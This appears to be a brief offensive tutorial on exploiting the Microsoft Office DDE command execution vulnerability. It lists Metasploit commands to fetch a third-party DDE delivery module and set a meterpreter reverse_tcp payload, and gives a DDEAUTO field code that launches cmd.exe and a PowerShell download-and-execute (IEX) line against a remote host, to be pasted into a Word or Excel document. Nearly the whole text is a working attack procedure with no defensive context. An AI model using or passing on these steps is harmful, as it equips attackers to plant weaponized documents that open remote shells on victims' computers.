Exploits, Office

Exploit Microsoft Office DDE Command Execution Vulnerability

Download module

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Move module into framework

mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

Open Metasploit and load exploit

msfconsole
reload_all
use exploit/windows/dde_delivery

Set the sever host

set SRVHOST 192.168.1.10

Choose payload and run it

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 443
exploit

Copy paste the code into any word/excel document.

  • Open Word/Excel.
  • Create a new document/sheet.
  • Insert tab -> Quick Parts -> Field… -> (Formula).
  • Right click on !Unexpected End of Formula -> Toggle Field Codes.
  • Change {=* MERGEFORMAT} to {DDEAUTO C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\cmd.exe “/C powershell -C;IEX((new-object system.net.webclient).downloadstring(‘https://x.x.x.x/ffff.txt’))”}
  • Save document.
  • The contents of the code that is retrieved from the server is Powershell code that is passed to the Invoke-Expression (IEX) cmdlet and executed.
  • Imagination?

Open meterpreter session

sessions 1
sysinfo